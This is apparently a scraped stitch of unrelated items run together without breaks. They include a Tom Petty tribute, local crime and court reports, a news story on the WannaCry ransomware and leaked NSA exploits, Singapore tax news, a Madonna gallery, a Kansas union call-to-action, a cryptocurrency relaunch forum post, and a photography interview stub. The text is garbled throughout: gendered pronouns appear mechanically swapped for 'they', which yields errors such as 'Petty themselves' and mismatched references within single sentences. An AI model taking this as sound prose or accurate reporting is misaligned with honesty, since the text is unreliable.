The single “Breakdown” was re-released in 1977 and peaked at #40 in early 1978. Their second album, You're Gonna Get It!, marked the band's first Top 40 album, but their third album, Damn the Torpedoes went platinum, sold nearly two million copies, and catapulted the band to stardom.
Over the course of their career, Petty released 13 studio albums with the Heartbreakers, three solo albums, two albums with Mudcrutch, and two albums as part of the supergroup The Traveling Wilburys.
The period between 1988-1994 could be considered Petty's artistic high point, with four seminal albums produced during that seven-year period; The Traveling Wilburys, Vol. 1, Full Moon Fever, Into the Great Wide Open, and Wildflowers.
An artist whose output spanned five decades as a recording artist, Petty has charted albums in the Top 5 on the Billboard 200 in every decade from the 70s up to their most recent recording, 2014's Hypnotic Eye. Their last album entered at No. 1., becoming the first Tom Petty and the Heartbreakers album to ever top the chart. They had 12 top 20 Billboard Hot 100 hits, with “Stop Draggin' My Heart Around” with Stevie Nicks being their highest charting song at No. 3.
Petty sold more than 80 million records worldwide, making them one of the best-selling music artists of all time. In 2002, Petty was inducted into the Rock and Roll Hall of Fame.
Petty has won GRAMMYs for Best Rock Performance By A Duo Or Group With Vocal for 1989 for Traveling Wilburys, Volume One, a collaboration with Bob Dylan, George Harrison, Jeff Lynne, and Roy Orbison; Best Male Rock Vocal Performance for 1995 for “You Don't Know How It Feels“; and Best Long Form Music Video for 2008 for the documentary Runnin' Down A Dream.
Petty's songs proved their durable and timeless. A 1993 collection of “Greatest Hits,” including the single “Mary Jane's Last Dance,” stayed on the Billboard album chart for six years.
IT'S GOOD TO BE KING
I always appreciated Petty's songs, but it wasn't until my adult years that I fell in love with their music. My teen years were the early 90s. Grunge and alternative rock were my musical mainstays. I also romanticized the 60s era of protest rock. Tom Petty's songs were catchy but they seemed trite. Pitted against 90s grunge, their 80s output seemed to suffer from overproduction.
And yet, Petty and the Heartbreakers endured through Punk, New Wave, 80s synth pop, and 90s grunge. Those genres and sounds came and went. All the while, Tom Petty and the Heartbreakers endured.
Tom Petty and their longtime band the Heartbreakers consistently delivered incredibly catchy rock and roll songs that were embraced by critics, fans, and fellow musicians alike. Stevie Nicks wanted to be in their band. They and the Heartbreakers backed Bob Dylan during the True Confessions tour.
They were a part of the greatest superband of all-time, the Traveling Wilburys. They contributed to several albums of Johnny Cash's American Recordings albums that were produced by Rick Rubin. Cash even covered a few Petty standards, their sublime “Southern Accents” and a somber but defiant, “I Won't Back Down.”
“It's shocking, crushing news,” Bob Dylan told Rolling Stone in a statement. “I thought the world of Tom. They were a great performer, full of the light, a friend, and I'll never forget him.”
https://twitter.com/springsteen/status/915221673200226304 https://twitter.com/BetteMidler/status/915578649981722630
RUNNIN' DOWN A DREAM
When Tom Petty and the Heartbreakers first started recording, the Ramones, Elvis Costello, Graham Parker, and punk rock, and then New Wave were in fashion. It wasn't clear exactly what genre they represented. In truth, Tom Petty and the Heartbreakers were a modern amalgamation of rock and roll's roots.
The sound of Petty's songs were shaped by the music they heard growing up: the harmonious melodies of the Beatles, the aggressive feedback of the Rolling Stones, the chiming guitars of the Byrds, and the dirty percussion of southern soul.
But more than anything, Tom Petty and the Heartbreakers were known for their songs. They and their bandmates churned out catchy rock songs that were deceptively simple but remarkable in their craftsmanship. Tom Petty songs were the quintessential sound of American rock.
Their songs were as catchy and melodic as anything from the Beach Boys. Just listen to American Girl, The Waiting, Don't Come Around Here No More, or Free Fallin'.
The talent and musicianship of the band rivaled Springsteen's E-Street Band. Benmont Tench is one of rock's greatest keyboardists. Mike Campbell is one of rock's unsung guitar heroes. Campbell is responsible for some of rock's greatest guitar licks.
Their approach is more of adding texture and looping melodies over long, excessive solos. Just listen to The Waiting or Breakdown to hear how they favor succinct, melodic solos that perfect blend into the song rather than draw attention to itself. Their fading outro solo on “Runnin' Down a Dream” is one of the greatest musical moments in a rock song, the epitome of a song that is meant to be listened to in the car with the windows rolled down.
Succinct Storytelling Genius
Time has been very kind to Petty's legacy as a songwriter and lyricist. The 60s and 70s ushered in an era of topical singer-songwriters. Critically acclaimed songwriters were viewed as poets, who chewed and spewed lyrical tongue-twisters.
Lyrics that leaned toward the abstract, obtuse, or stream-of-consciousness were judged as serious, heavy, and important. But Tom's reputation as a lyricist and singer has only grown in stature the further removed from eras of the 60s and 70s. Nowadays, the pomposity and hubris of artists like Neil Diamond or the Eagles only grow more cringe-worthy of their songs dripping in self-importance.
Even late era Bruce Springsteen has fallen victim to manufactured gravitas, having fallen victim to the need for each of their songs to be grander than the last and making themselves a caricature of their old self.
But Tom could sing about universal themes of love, restless youthfulness, and everyday themes that listeners of every era and generation could relate to. Their lyrics were often straightforward to the point of Hemingway-esque brilliance. They were a storyteller that loved the classic formula of a rock song (verse, chorus, verse, chorus, bridge/musical solo, chorus).
Their rock and roll peers were closer to Buddy Holly and Roy Orbison over Dylan or Paul Simon.
The economy of their words evoked emotional truths that echoed the best songs from Johnny Cash and Townes Van Zandt. They could spin a good yarn/story and turn it into a simple, campfire singalong song. That was the genius of Tom Petty.
But their songs stayed down-to-earth, with sturdy guitar riffs carrying lyrics that spoke for underdogs, ornery outcasts, and the youthful rebels in dire need to escape.
STRAIGHT INTO DARKNESS
Amid their successes, Petty also suffered dark periods during a career. A 2015 biography of the singer, “Petty: The Biography” addressed in great detail about dark events and periods in Petty's career. Tom suffered from depression, channeling their pain into 1999's Echo, during which they were also dealing with a divorce.
In 2002, they married Dana York and said they had been in therapy for six years to deal with depression. Their biography also included the participation of Stan Lynch, the ex-drummer of The Heartbreakers. Lynch talked unflinchingly about their falling-out with Petty.
Petty's biography and Peter Bogdanovich's documentary film Runnin' Down a Dream also explored bassist Howie Epstein's heroin addiction. The Heartbreakers bassist dealt with a drug problem throughout much of the Nineties, but by the early 2000s, the talented musician and vocal harmonist was missing shows and physically falling apart.
Petty fired them shortly after the group was inducted into the Rock and Roll Hall of Fame in 2002, replacing them with original Heartbreakers bassist Blair. Epstein died of an overdose in 2003.
Petty themselves struggled with heroin addiction, something they addressed for the first time in their biography but was omitted from Bogdanovich's four-hour documentary.
TIME TO MOVE ON
Because of their timeless sensibilities in songwriting and sound, Petty's music successfully connected to a younger generation. They headlined the Bonnaroo Music Festival in Tennessee in 2006 and 2013. “We're one of those old, lucky bands,” they told Rolling Stone magazine in 2013. “Young people come to see us. It makes a difference.”
I am deeply saddened by their passing, and the opportunity I will never experience of seeing Tom Petty and the Heartbreakers live in concert. But their songs will endure, and the music world will forever be in their debt.
Their manager Tony Dimitriades announced, “He died peacefully at 8.40pm surrounded by family, their bandmates and friends.” Tom Petty is survived by their wife Dana, their daughters Adria and AnnaKim Violette, and their ex-wife Jane Benyo.
Football is serious and football fans are fanatic. In Packers country, they can be downright brutal.
A homeowner in Stoughton, WI said he's lucky to be alive after being attacked in their yard Sunday evening.
The Stoughton Police Department said Dave Moschel, 36, was just sitting down to watch football when they were alerted to a commotion outside their house. After finding a man trespassing on their property, they confronted the 21-year-old in their front yard when they discovered the man had slashed their Viking inflatable.
“He probably thought it was funny, and maybe their buddies thought it would be cool to come slice it up,” Moschel said.
“You hear them slicing this guy up, come outside, and ‘Hey, what are you doing?' Confront the guy,” Moschel said. “He takes their razor knife or whatever they had in their hand and we just go on the ground and start rifling around.”
But Moschel, who has a concealed carry permit, wasn't carrying their gun when the confrontation turned physical, leaving them beaten and sliced multiple times by a box cutter.
“Luckily, I didn't have my concealed carry on me at the time,” Moschel said. “Ninety-nine percent of the time I leave the house, I never leave without it. And this is the one time I did. I'm kind of glad I did, because they would have been dead, and I would have had to live with that.”
Moschel was taken to Stoughton Hospital where they received multiple stitches for wounds to their forehead and under their eye. But the proud fan was also happy to report that their Vikings friend will also survive the attack.
“(The inflatable) is going to get a little piece of Vikings duct tape put on there and it's going to be blown up every day of the week from now on,” Moschel said. “I'm still here, still living, still watching football.”
Police say the alleged attacker was arrested at the scene on suspicion of first-degree reckless endangerment and criminal damage to property.
Moschel, who says he's a concealed carry holder, says man who stabbed them is lucky they didn't have their gun, or would have been dead. #news3 pic.twitter.com/aHUvFIQmR4 — Chris Gothner (@cgothner) October 10, 2016
After software vulnerabilities exploited and leaked by the NSA were used by cybercriminals to infect as many as 200,000 Windows PCs with ransomware over the last three days, Microsoft has criticized government agencies for hoarding those flaws and keeping them secret.
One particular vulnerability in Windows, leaked by a shady crew called Shadow Brokers, was used by the WannaCry hackers to give their ransomware a worm feature, allowing it to spread between vulnerable PCs silently and at speed. That flaw was exploited by a tool called EternalBlue and was patched by Microsoft in mid-March, but those who didn't apply the update were still open to attack, resulting in the mammoth attack starting Friday that infected 48 UK National Health Service trusts, FedEx, Telefonica, Renault and Nissan car manufacturing plants, U.S. universities, Russian governments and Chinese ATMs, amongst many other systems across 150 countries.
Microsoft president and chief legal officer Brad Smith said by keeping software weaknesses secret, vendors are left in the dark, can't issue updates, and their customers are left vulnerable to attacks such as the one that exploded this weekend. they compared the leak of NSA exploits to the theft of missiles from the American military, pointing also to the Wikileaks dump of CIA hacking tools.
"An equivalent scenario with conventional weapons would be the U.S. military having some of its Tomahawk missiles stolen. And this most recent attack represents a completely unintended but disconcerting link between the two most serious forms of cybersecurity threats in the world today – nation-state action and organized criminal action," Smith wrote in a blog post published Sunday.
"The governments of the world should treat this attack as a wake-up call. They need to take a different approach and adhere in cyberspace to the same rules applied to weapons in the physical world. We need governments to consider the damage to civilians that comes from hoarding these vulnerabilities and the use of these exploits."
Smith called for a "Digital Geneva Convention" that would include "a new requirement for governments to report vulnerabilities to vendors, rather than stockpile, sell, or exploit them."
Intelligence agencies, private government contractors and criminals all develop hacks for all kinds of software and keep their techniques secret. The legal use of such exploits assists with law enforcement investigations, military operations and securing against such attacks. They've become so valuable an iPhone hack, for instance, can fetch more than $1 million.
Rob Graham, a security expert who will not say if he's previously developed and sold such exploits in a private capacity, said the NSA deserved "a lot of blame for having weaponized the exploit, then allowing it to leak to the internet."
But, Graham added, it was "stupid" to believe the NSA would "unilaterally disarm itself" and that "arms control trying to regulate such things is even stupider."
"There's no difference between legitimate software we use to test networks and evil software we use to hack into networks. Code is speech -- there is no way of 'controlling' software that doesn't also control speech," they added.
"People keep putting 'cyber' in front a real world concept like 'weapon' and believe all the same principles apply. They don't. Cyberweapons are nothing like weapons, anything you derive from the analogy (like cyberarms control) is going to be flawed."
Microsoft fights WannaCry
Though some have criticized Microsoft for not supporting older Windows versions with updates, it's taken the fight to WannaCry in multiple ways. It issued a fix for Windows XP machines, even though it's been out of support since 2014, 12 years after the operating system was released. It also added updates to Windows Defender in an attempt to prevent the malware from spreading further.
Monday could see the launch of fresh attacks of the ransomware, which locked up PCs and demanded $300 from victims or their files would be deleted. Hackers have started to alter the malware's code to ensure that it doesn't contain a killswitch (as the last version did, as one researcher found out to the world's gain) and is less likely to be killed off so easily.
"The new variants appear to have been made by third parties modifying the initial malware. The changes are trivial and some do bypass the so called killswitch," said Craig Williams, senior technical leader and global outreach manager at Cisco Talos. Those new variants are not yet spreading, however.
Many computers also still contain the weaknesses exploited by the ransomware crooks. According to Graham, a scan a week ago revealed as many as 40,000 computers were infected with DoublePulsar, an NSA backdoor that was abused by WannaCry's coders. Earlier in April, researcher Dan Tentler said 1,724,749 were vulnerable to DoublePulsar attacks.
One major concern is that users will enter work with infected systems and spread the ransomware via the EternalBlue vulnerability, launching a fresh wave of attacks.
It's not today, but tomorrow, when people take their notebooks into work, auto connect to wifi, and ask IT to fix them. #wannacry — Rob Graham٩(●̮̮̃●̃) (@ErrataRob) May 14, 2017
UPDATE at 7.20am ET to note that Robert Graham has no comment on whether they have previously developed and sold exploits in a private capacity.
SINGAPORE - Goods and services tax (GST) could soon be levied on e-commerce purchases as the Government looks to diversify its tax base and capture value from this fast-growing sector, experts said.
This could mean getting big e-commerce players to register for GST here if they sell to Singapore consumers, or getting the customers themselves to pay tax on the goods and services they buy online.
Their comments come after Senior Minister of State for Law and Finance Indranee Rajah said in an interview with Bloomberg on Tuesday (Nov 21) that e-commerce will likely come under the local tax regime soon.
"You can imagine, 20 years from now, the way people purchase is very different and by that time online platforms will be mainstays, so if that's not part of the tax regime, there's going to be a lot of holes there," they said.
Finance Minister Heng Swee Keat said in the Budget earlier this year too that the Government was studying ways to tax e-commerce.
Currently, online purchases of goods and services under $400 are not taxed in Singapore. "The $400 GST exemption threshold could be reviewed for the purposes of capturing online shopping transactions," said KPMG Singapore's head of tax, Mr Chiu Wu Hong.
"Digital services (eg music downloads, e-books) rendered by foreign companies could be brought into the GST net by using a 'reverse charge' mechanism, or by way of requiring them to register for GST if they were to provide to end consumers in Singapore."
Related Story Experts expect GST hike within a few years
Related Story Tax kitty must grow with needs
A reverse charge mechanism requires the customer to account for the tax on supplies received from foreign suppliers.
PwC Singapore's Asia Pacific indirect tax leader Koh Soo How noted too that the Government has said that the main intention of bringing online shopping within the tax regime is to make it a level playing field between local GST-registered retailers and overseas sellers.
"There are different collection models for imposing the GST on cross-border transactions. However, what most countries have settled on when taxing the digital economy is the vendor collection model which is seen to be most feasible in terms of practicality and costs," they said.
Under such a model, the overseas vendor is required to register for GST to collect and account for GST on sales to consumers in the local country.
Mr Yeo Kai Eng, a GST services partner at Ernst & Young Solutions, noted that this has been a common approach in several countries, which have also introduced simplified GST registration for overseas suppliers of digital services and low-value goods to make it less onerous on the e-commerce players.
"The key for Singapore is not to rush into it," they said. "Consultation with key stakeholders should be made to study the impact and effectiveness of any new measures to impose GST on overseas suppliers of digital services and low-value goods before they are introduced."
18 PHOTOS Madonna through the years See Gallery Madonna's 'Crazy For You' became a number-one hit, 30 years ago today THE TONIGHT SHOW STARRING JIMMY FALLON -- Episode 0243 -- Pictured: Host Jimmy Fallon, Madonna and The Roots during the Music Room segment on April 9, 2015 -- (Photo by: Douglas Gorenstein/NBC) NEW YORK, NY - MARCH 24: (EXCLUSIVE COVERAGE) Jimmy Fallon and Madonna sign the Facebook wall before their livestream interview at the Facebook offices on March 24, 2012 in New York City. (Photo by Dimitrios Kambouris/Getty Images) NEW YORK, NY - MARCH 24: (EXCLUSIVE COVERAGE) Madonna signs the Facebook wall before their livestream interview with Jimmy Fallon at the Facebook offices on March 24, 2012 in New York City. (Photo by Dimitrios Kambouris/Getty Images) X-mas is coming early! Pre order my album and download 6 tracks! Happy Holidays! ❤️#rebelheart US pop diva Madonna sits among Malawian children during a visit to the Mkoko Primary School, one of the schools Madonna's Raising Malawi organization has built jointly with US organization BuildOn in the Kasungu District, Central Malawi, on November 30, 2014. Madonna met Malawi's new president on November 28 after their VIP status was restored in the country where they adopted two children but then fell foul of the former government. Madonna has adopted two children from the country, which officially has more than a million orphans and vulnerable children. AFP PHOTO/AMOS GUMULIRA (Photo credit should read AMOS GUMULIRA/AFP/Getty Images) SATURDAY NIGHT LIVE -- Jimmy Fallon/Justin Timberlake Episode 1651 -- Pictured: (l-r) Madonna, Justin Timberlake, Jimmy Fallon, Cecily Strong -- (Photo by: Dana Edelson/NBC/NBCU Photo Bank via Getty Images) US star Madonna (L) walks out with Dr. Eric Borgstein(R) after visiting the Queen Elizabeth Central Hospital (QECH) on November 27, 2014 where they launched a new project with Ministry of Health to construct a pediatric surgery and intensive care unit at the hospital in Blantyre. AFP PHOTO/STRINGER (Photo credit should read STRINGER/AFP/Getty Images) NEW YORK, NY - NOVEMBER 05: Editor-in-Chief WSJ. Magazine Kristina O'Neill, dancer Charles 'Lil Buck' Riley and Madonna attend WSJ. Magazine 2014 Innovator Awards at Museum of Modern Art on November 5, 2014 in New York City. (Photo by Jamie McCarthy/Getty Images) NEW YORK, NY - OCTOBER 30: (Exclusive Coverage) Kanye West, Madonna and Riccardo Tisci attend Keep A Child Alive's 11th Annual Black Ball at Hammerstein Ballroom on October 30, 2014 in New York City. (Photo by Kevin Mazur/Child2014/WireImage) NEW YORK, NY - NOVEMBER 05: Madonna speaks at WSJ. Magazine 2014 Innovator Awards at Museum of Modern Art on November 5, 2014 in New York City. (Photo by Mike Coppola/Getty Images) NEW YORK, NY - NOVEMBER 05: Madonna attends WSJ. Magazine 2014 Innovator Awards at Museum of Modern Art on November 5, 2014 in New York City. (Photo by Jamie McCarthy/Getty Images) NEW YORK, NY - OCTOBER 30: (Exclusive Coverage) Madonna attends Keep A Child Alive's 11th Annual Black Ball at Hammerstein Ballroom on October 30, 2014 in New York City. (Photo by Kevin Mazur/Child2014/WireImage) LOS ANGELES, CA - JANUARY 26: Singer Madonna arrives at the 56th GRAMMY Awards at Staples Center on January 26, 2014 in Los Angeles, California. (Photo by Axelle/Bauer-Griffin/FilmMagic) LOS ANGELES, CA - JANUARY 26: Singer Madonna and son David Banda Mwale Ciccone Ritchie arrive at the 56th GRAMMY Awards at Staples Center on January 26, 2014 in Los Angeles, California. (Photo by Axelle/Bauer-Griffin/FilmMagic) LOS ANGELES, CA - JANUARY 26: Singer Madonna and son David Banda Mwale Ciccone Ritchie arrive at the 56th GRAMMY Awards at Staples Center on January 26, 2014 in Los Angeles, California. (Photo by Axelle/Bauer-Griffin/FilmMagic) LOS ANGELES, CA - JANUARY 26: (L-R) Rapper Macklemore, singer Mary Lambert and singer Madonna perform onstage during the 56th GRAMMY Awards at Staples Center on January 26, 2014 in Los Angeles, California. (Photo by Kevin Winter/WireImage) LOS ANGELES, CA - JANUARY 26: Singer Madonna performs onstage during the 56th GRAMMY Awards at Staples Center on January 26, 2014 in Los Angeles, California. (Photo by Kevin Winter/WireImage) LOS ANGELES, CA - JANUARY 26: Singer Madonna performs onstage during the 56th GRAMMY Awards at Staples Center on January 26, 2014 in Los Angeles, California. (Photo by Kevork Djansezian/Getty Images) Up Next See Gallery Discover More Like This HIDE CAPTION SHOW CAPTION of SEE ALL BACK TO SLIDE
'Crazy For You' was Madonna's first ballad to become a hit, and we're celebrating 30 years of its impact on popular music.Madonna has never been a pop star to play by the rules, but they continue to win at the game. After breaking out almost 35 years ago, they have quite a lot of claim to their name -- they aren't called the "Queen of Pop" for nothing.After selling over 300 million albums worldwide, she's been crowned the most successful chart-performing solo artist and top-touring female artist of all time . The global music icon is even worth a whopping $800 million 'Crazy For You' was originally written for the film "Vision Quest," which saw moderate success in the box office . However, the song became a massive hit on adult contemporary radio all around the world. It even nabbed Madonna their first Grammy nomination for Best Female Pop Vocal Performance in 1986. The song went on to become their second number-one single on the U.S. Billboard Hot 100.It's moments in musical history, like this, when we're reminded of the bona fide pop star that Madonna truly is.Needless to say, we're still crazy about Madonna's 'Crazy For You.'
A DRINK-driving case had to be adjourned after it was found that the accused was written down as a seven-year-old with the incorrect address.
Limerick District Court recently heard that a passing taxi driver alerted gardaí to the woman, who was allegedly attempting to drive to Dublin on a flat tyre, while under the influence.
When gardaí arrived at the scene, at Ballysimon Road, the 39-year-old woman was later arrested and brought to Roxboro Road garda station.
The court heard that the woman gave two blood samples at Roxboro Road, and it was later found that the learner driver was 10 times over the limit.
However, after solicitor Brendan Gill argued that there was a “discrepancy” in their personal details on the medical certificate, Judge Marian O'Leary decided to move the case to a later date.
Witness Denis Kavanagh told the court, on Thursday June 8, that they offered to change the woman's flat tyre when they spotted their broken down vehicle on the Ballysimon Road flyover, at 5.10am on April 24, 2016.
When they said that they had no spare wheel, the taxi driver offered to drive them to a friend's house in Limerick “free of charge”.
“She told me that they wanted to get back to Dublin, and that they were alright,” the witness said.
And after they told them that they could not drive, given in the car's state, they attempted to drive but could not control the vehicle due to the flat tyre, the court heard.
“At this stage, I became fearful for themselves and for the other road users, so I put on my hazards,” they said.
After they managed to take the driver's keys out of the ignition and place them into their pocket, they phoned the gardaí, who arrived within 20 minutes, they said.
They told the court that it took the gardaí “a great length of time” to arrive at the scene.
Garda Billy Creedon, who was joined by another officer, attended the scene after being alerted to the incident at 5.40am, they told the judge from the witness box.
They told the court that when they approached the driver, they got “strong smell of intoxicant from their breath”, their speech was “slurred” and that their eyes were bloodshot.
After they found that the woman, from Wicklow, was “unsteady on their feet”, they formed the opinion that they were incapable of operating a mechanically-propelled vehicle.
The court heard that after they were placed in the patrol car, they then exited the vehicle, “ran across the road before oncoming traffic”, and they were “quickly apprehended”.
Gda Creedon said that when they were brought back to the patrol car, they became “very abusive” towards the two gardai “calling us a number of obscenities”. They were then handcuffed and placed in the patrol car, before being brought to Roxboro Road garda station at 6.30am.
A doctor was contacted at 6.52am, and after their arrival at 7.20am, two blood samples were taken and sent for analysis to the Medical Bureau of Road Safety.
Results showed that they had a reading of 213mg of alcohol per 100ml of blood. The court was told they were on a learner permit at the time. The legal limit for a driver on a learner permit is 20mg of alcohol per 100ml of blood.
When Mr Gill asked Gda Creedon why there was a delay returning to Roxboro Road, they replied that they had been waiting for a tow truck to arrive.
When they questioned Gda Kieran Curtin – the person in charge at the time – on why it took them 22 minutes to contact a doctor, Gda Curtin replied: “The prisoner was quite difficult to deal with in getting information from them That was possibly the reason for the delay.”
They said the “incoherent” defendant said they drank “five pints and a vodka”. Mr Gill told the judge that there were three issues arising out of the case, including the “incomplete” Section 17 medical certificate. They said that “this was not a minor” error and that “an important section has not been completed”.
An incorrect address was written on the certificate and the date of birth was dated 2010, instead of 1977.
Secondly, they said that “a doctor can be contacted immediately, and the delay hasn't been properly explained”. They added that the person in charge – Gda Curtin – was “only present for part of the process” as they had left the garda station at 7am.
Insp Dermot O'Connor argued that the Section 17 statement was “not incomplete”, and that it was not possible for a seven-year-old to be providing a blood sample at a garda station.
They added that the certificate “relates to one person and one person only”. They added that the person “has not been, in any way, prejudiced by the administrative errors”. They argued that there was no “undue delay” in contacting the doctor, either.
Judge Marian O'Leary said that they would revisit the case on July 6.
The Prime Minister's office has sent information to The Barrie Advance regarding a money-losing speech Liberal leader Justin Trudeau made in Barrie in 2007.
On Monday, PMO communications officer Erica Meekes sent The Advance details of an engagement that netted Trudeau a $10,000 fee, but left Georgian College with a $4,118 shortfall. The information was sent via email with the caveat it is referred to as coming from a “source,” not the PMO, when used.
· Harper must deliver on old promises to stop third-term slump: Editorial
“As a follow-up to the growing controversy over the weekend on Justin Trudeau charging charities for their speaking services, I have enclosed further materials that demonstrate the scope of this practice, cost on the organizations, and in many cases, poor outcomes and large deficits as a result of their speaking tour,” the email stated. “As discussed, these materials are provided to you on background, and should be attributed to a ‘source.'”
The material included invoices, a promotional poster and an accommodation receipt for the Toronto Four Seasons. Meekes wrote, “To be fair, there is an in-house yoga studio at the Four Seasons!”
When asked in a telephone interview why Prime Minister Stephen Harper's office was sending out unsolicited documentation, Meekes said the PMO routinely reaches out to the media.
ALSO FROM THESTAR.COM:
Once again the Republicans on the House Commerce, Labor, and Economic Development Committee are seeking to limit the voices of working Kansans with HB 2023 (the Senate Republicans have also introduced SB 31, which is a duplicate for this bill).
Tomorrow (January 23rd) at 1:30 p.m. CST the committee will hold hearings on a bill (HB 2023) that would restrict the fundamental constitutional rights of public employees from engaging in political speech. Likewise important, the bill would prohibit voluntary automatic deductions for the purpose of engaging in a free democracy.
Much like our friends in Wisconsin, Ohio and Indiana, we are facing the same basic strategy from our opposition
STEP 1 - SILENCE THE OPPOSITION
STEP 2 - TAKE AWAY YOUR RIGHT TO BARGAIN
STEP 3 - CUT YOUR WAGES AND BENEFITS
STEP 4 - FIND SOMEONE WHO WILL DO YOUR JOB FOR LESS THAN YOU WILL
This legislation is will be heard tomorrow in committee! If you're a Kansan, act now and contact your state representative. Tell them to get off your back and out of your paycheck!
These legislators are on the committee and need to hear from you. Call and e-mail them and urge them to keep government off our backs! Tell them you know how best to spend your own paycheck!
Chairman - Marvin Kleeb (R - District 48 - Overland Park)
marvin.kleeb@house.ks.gov
785 296-7680
Vice Chair - Gene Sullentrop (R - District 91 - Wichita)
gene.suellentrop@house.ks.gov
785 296-7681
Steve Brunk (R - District 85 - Wichita)
steve.brunk@house.ks.gov
785 296-7645
Richard Carlson (R - District 61 - St. Mary's)
richard.carlson@house.ks.gov
785 296-4830
Will Carpenter (R - District 75 - El Dorado)
will.carpenter@house.ks.gov
785 296-7673
J.R. Claeys (R - District 69 - Salina)
jrclaeys@house.ks.gov
785 296-7670
Ken Corbet (R - District 54 - Topeka)
ken.corbet@house.ks.gov
785 296-7679
Travis Couture-Lovelady (R - District 110 - Palco)
lovelady@house.ks.gov
785 296-4683
Michael Houser (R - District 1 - Columbus)
michael.houser@house.ks.gov
785 296-7679
Mark Hutton (R - District 105 - Wichita)
mark.hutton@house.ks.gov
785 296-7673
Joshua Powell (R - District 50 - Topeka)
joshua.powell@house.ks.gov
785 296-7674
Allan Rothlisberg (R - District 65 - Grandview Plaza )
allan.rothlisberg@house.ks.gov
785 296-7653
almightyruler
Offline
Activity: 1848
Merit: 1025
LegendaryActivity: 1848Merit: 1025 [ANN][CAGE] CAGECOIN REVIVAL: New difficulty algorithm, network moving again! August 11, 2014, 08:59:08 AM
Last edit: February 08, 2018, 05:24:51 AM by almightyruler #1 *** NEW VERSION RELEASED. MANDATORY UPDATE. ***
Hi, I'm almightyruler, and I've just revived CAGE. The network died about 2 months ago because of a flawed difficulty retargeting algorithm, and has been stuck at a high and very unprofitable difficulty since then. I've updated the client to use a more reliable per-block retargeting algorithm, so we can finally get back to mining!
Download:
Windows QT client: http://www.almightycoins.org/cagecoin/download/cagecoin-qt.exe
Source code: https://www.dropbox.com/s/764o8rz3llbi7eb/cagecoin-0.7.0-src.zip
Simply copy (or compile) this version over the old one. It is compatible with the existing wallet and blockchain database.
If you're a first time user, then on Windows all you need to do is run cagecoin-qt.exe. The client will set up the necessary databases.
Important: If you have had your old CAGE client running any time in the past 24 hours, you should delete peers.dat before starting the new client.
Features of the new version:
- Blockchain preserved. All previously mined blocks and transactions remain valid.
- Difficulty algorithm changed to per-block retargeting past block 156042, to avoid network getting stuck again
- Two seed nodes brought online, so clients can sync without needing any configuration (no need to mess with addnode)
- Peer finding via IRC improved
- Checkpoints added
- Fair relaunch (no instamine)
This is a HARD FORK, so you will not be able to mine, transact, or do anything useful unless you use this version.
Note about fair relaunch: the first 2880 blocks (approximately 48 hours) after the fork each have a reward of exactly 1 CAGE. This is to allow the network to reach equilibrium without people instamining and benefiting from the very low difficulty on the way up. After 2880 blocks, the rewards will return to normal amounts (currently random 0 to 500000 Cages)
Since this is a relaunch I don't have any premine or instamine funds. Please consider donating for my time: DkCQGZ2qaDbxGSj18BkKrkfcFs1McicH1h
Specifications:
Algorithm: scrypt
Block time: 60 seconds
Difficulty retarget: every block
(original retarget was every 4 hours, which is what stalled the network)
Maximum supply: 100 billion Cages
Reward block 1-100000: random 0 to 1000000 Cages
Reward block 100001-200000: random 0 to 500000 Cages
Reward block 200001-300000: random 0 to 250000 Cages
Reward block 300001-400000: random 0 to 125000 Cages
Reward block 400001-500000: random 0 to 62500 Cages
Reward block 500001-600000: random 0 to 31250 Cages
Reward block 600001 and on: fixed 10000 Cages
Pools:
http://cagecoinpool.com/
https://aikapool.com/cage/
Exchanges:
https://www.cryptopia.co.nz/Exchange/?market=CAGE_DOGE
https://www.cryptopia.co.nz/Exchange/?market=CAGE_DOT
https://www.cryptopia.co.nz/Exchange/?market=CAGE_FTC
https://www.cryptopia.co.nz/Exchange/?market=CAGE_LTC
https://www.cryptopia.co.nz/Exchange/?market=CAGE_UNO
https://www.cryptopia.co.nz/Exchange/?market=CAGE_XMR
https://www.novaexchange.com/market/BTC_CAGE/
https://www.novaexchange.com/market/LTC_CAGE/
https://www.novaexchange.com/market/DOGE_CAGE/
https://www.novaexchange.com/market/KIC_CAGE/
https://www.novaexchange.com/market/ESP2_CAGE/
https://www.novaexchange.com/market/PIGGY_CAGE/
https://www.novaexchange.com/market/MOON_CAGE/
https://www.coingather.com/exchange/CAGE/BTC
https://www.coingather.com/exchange/CAGE/LTC
Website:
http://cagecoin.net
Block explorer:
http://cagechain.info/chain/Cagecoin
Let's get the word out that CAGE is back!
Original thread (most of the old links and services are dead) : Hi, I'm almightyruler, and I've just revived CAGE. The network died about 2 months ago because of a flawed difficulty retargeting algorithm, and has been stuck at a high and very unprofitable difficulty since then. I've updated the client to use a more reliable per-block retargeting algorithm, so we can finally get back to mining!Simply copy (or compile) this version over the old one. It is compatible with the existing wallet and blockchain database.If you're a first time user, then on Windows all you need to do is run cagecoin-qt.exe. The client will set up the necessary databases.- Blockchain preserved. All previously mined blocks and transactions remain valid.- Difficulty algorithm changed to per-block retargeting past block 156042, to avoid network getting stuck again- Two seed nodes brought online, so clients can sync without needing any configuration (no need to mess with addnode)- Peer finding via IRC improved- Checkpoints added- Fair relaunch (no instamine)Note about fair relaunch: the first 2880 blocks (approximately 48 hours) after the fork each have a reward of exactly 1 CAGE. This is to allow the network to reach equilibrium without people instamining and benefiting from the very low difficulty on the way up. After 2880 blocks, the rewards will return to normal amounts (currently random 0 to 500000 CAGE)Algorithm: scryptBlock time: 60 secondsDifficulty retarget: every blockMaximum supply: 100 billion CAGEReward block 1-100000: random 0 to 1000000 CAGEReward block 100001-200000: random 0 to 500000 CAGEReward block 200001-300000: random 0 to 250000 CAGEReward block 300001-400000: random 0 to 125000 CAGEReward block 400001-500000: random 0 to 62500 CAGEReward block 500001-600000: random 0 to 31250 CAGEReward block 600001 and on: fixed 10000 CAGELet's get the word out that CAGE is back!Original thread (most of the old links and services are dead) : https://bitcointalk.org/index.php?topic=394958.0
This interview is just one of many from our free, downloadable Guide: Breaking Into Commercial Photography. For more tips, download your copy today, here.
Emiliano Granado picked up a camera in 2001 as a hobby. They were working at a New York advertising agency and didn't like it at all, so they decided to take a class at International Center of Photography. It snowballed into a new career, and they were able to quit their job in 2005 and start freelancing as an assistant while shooting personal work. They got their first assignments in 2007.
